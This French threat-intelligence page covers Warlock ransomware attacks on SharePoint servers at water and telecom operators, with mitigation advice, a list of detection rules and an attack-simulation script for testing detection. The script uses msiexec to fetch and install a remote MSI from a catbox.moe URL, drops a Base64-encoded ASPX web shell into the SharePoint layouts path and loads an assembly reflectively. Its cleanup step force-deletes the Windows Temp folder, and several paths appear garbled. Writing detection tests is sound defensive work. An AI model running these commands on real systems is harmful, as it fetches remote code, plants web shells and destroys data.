Les Attaques du Rançongiciel Warlock sur les Infrastructures Critiques de l’Eau et des Télécommunications
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un acteur menaçant lié à la Chine, suivi sous le nom de Longlegs, déploie le ransomware Warlock en exploitant des vulnérabilités de Microsoft SharePoint. Le groupe utilise une chaîne d’exploitation ToolShell pour l’accès initial avant de se déplacer latéralement à travers les réseaux compromis. Les attaquants appliquent également des techniques d’évasion avancées, notamment en abusant de pilotes vulnérables pour désactiver les logiciels de sécurité et en utilisant des services cloud légitimes pour la livraison de charges utiles.
Enquête
L’enquête a retracé une activité allant de l’exploitation initiale de SharePoint au déploiement d’un webshell dans le répertoire LAYOUTS. Les analystes ont observé des clés machine ASP.NET forgées utilisées pour l’exécution de code à distance et un ransomware mis en scène dans le partage SYSVOL pour une distribution à l’échelle du domaine. La chaîne d’attaque impliquait également le chargement de DLL et l’abus de la fonctionnalité de tunneling de Visual Studio Code pour un accès persistant.
Atténuation
Les organisations devraient donner la priorité au correctif du serveur Microsoft SharePoint pour remédier aux vulnérabilités connues de ToolShell. L’application de contrôles stricts sur les pilotes signés mais vulnérables peut aider à prévenir les attaques BYOVD. Les équipes de sécurité devraient également surveiller l’utilisation anormale des outils de type « living-off-the-land » et restreindre l’accès au partage SYSVOL pour les activités non administratives afin de réduire les mouvements latéraux et le déploiement de ransomwares.
Réponse
Lorsque des activités malveillantes sont détectées, les intervenants en cas d’incident devraient isoler les serveurs SharePoint affectés et inspecter le partage SYSVOL pour détecter des scripts ou binaires non autorisés. Effectuer un audit complet des comptes de domaine, en se concentrant sur les ajouts non autorisés au groupe administrateurs locaux. Vérifier le trafic réseau pour les connexions sortantes vers des services de partage de fichiers tels que catbox.moe ou wasabisys.com utilisés pour le staging des charges utiles.
Flux d’attaque
Détections
Ajouter un utilisateur aux administrateurs locaux (via la ligne de commande)
Téléchargement ou Envoi via Powershell (via la ligne de commande)
Chaînes Powershell suspectes (via la ligne de commande)
Appel de classes/méthodes .NET suspectes depuis une ligne de commande PowerShell (via la création de processus)
Découverte possible de partages réseau (via la ligne de commande)
Découverte suspecte de relations de confiance de domaine (via la ligne de commande)
Tentative possible d’installation de fichier MSI à distance (via la ligne de commande)
Exécution suspecte depuis un profil utilisateur public (via la création de processus)
Chaînes Powershell suspectes (via powershell)
Appel de méthodes .NET suspectes depuis PowerShell (via powershell)
Création possible de Webshell dans les répertoires Microsoft Exchange / SharePoint (via événement fichier)
Fichiers suspects dans un profil utilisateur public (via événement fichier)
Infiltration/exfiltration de données possible / C2 via des services/outils tiers (via proxy)
Infiltration/exfiltration de données possible / C2 via des services/outils tiers (via dns)
Commande et contrôle suspects par requête à un domaine d’interactions hors bande (via dns)
IOCs (HashSha256) à détecter : Attaquants de ransomware Warlock ciblent des opérateurs de l’eau et des télécommunications
Détection de commande PowerShell malveillante pour l’exécution de code [Windows Powershell]
Mise en scène et exécution du ransomware Warlock via des partages réseau [Événement fichier Windows]
Indicateurs de ransomware Warlock sur les serveurs SharePoint [Création de processus Windows]
Exécution de simulation
Prérequis : La vérification pré-vol des télémétries et de la base de référence doit avoir été réussie.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront une mauvaise interprétation.
-
Narratif & Commandes d’Attaque : L’adversaire vise à déployer le ransomware Warlock sur un serveur SharePoint. L’attaque commence par utiliser
msiexecpour récupérer un MSI malveillant à partir d’un domaine contrôlé par l’attaquant à distance (catbox.moe). Suite à l’accès initial, l’attaquant utilise PowerShell pour écrire une web shell ASPX malveillante dans le SharePointchemind'accès layout2sp.aspxen utilisant une charge utile codée en Base64 pour contourner les filtres de chaîne simples. Enfin, l’attaquant tente de charger un assembly .NET malveillant directement en mémoire à l’aide deSystem.Workflow.ComponentModelpour exécuter du code sans laisser d’empreinte sur le disque. -
Script de Test de Régression :
# Script de Simulation de Ransomware Warlock # REMARQUE : Ce script est à utiliser uniquement à des fins de test autorisées. Write-Host "[!] Démarrage de la simulation de ransomware Warlock..." -ForegroundColor Red # 1. Simuler le téléchargement MSIEXEC à distance (Sélection 3) Write-Host "[*] Simulation du téléchargement de la charge utile à distance via MSIEXEC..." Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue # 2. Simuler la dépose de Web Shell ASPX via PowerShell (Sélection 1) # Nous utilisons exactement la chaîne de la règle pour garantir la détection Write-Host "[*] Simulation de la dépose de web shell via PowerShell en Base64..." $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))""" Invoke-Expression $cmd1 # 3. Simuler le chargement réflexif d'assemblage (Sélection 2) Write-Host "[*] Simulation du chargement réflexif d'assemblage..." $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel" Invoke-Expression $cmd2 Write-Host "[+] Commandes de simulation envoyées." -ForegroundColor Green -
Commandes de Nettoyage :
# Script de nettoyage pour supprimer tous les artefacts créés pendant la simulation Write-Host "[!] Nettoyage des artefacts de simulation..." -ForegroundColor Yellow # Supprimer les fichiers simulés (Remarque : dans un vrai test, vous cibleriez les chemins spécifiques créés) # Étant donné que nous avons utilisé des chaînes factices, nous nous assurons principalement qu'aucun fichier malveillant réel n'a été déposé. Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Nettoyage terminé." -ForegroundColor Green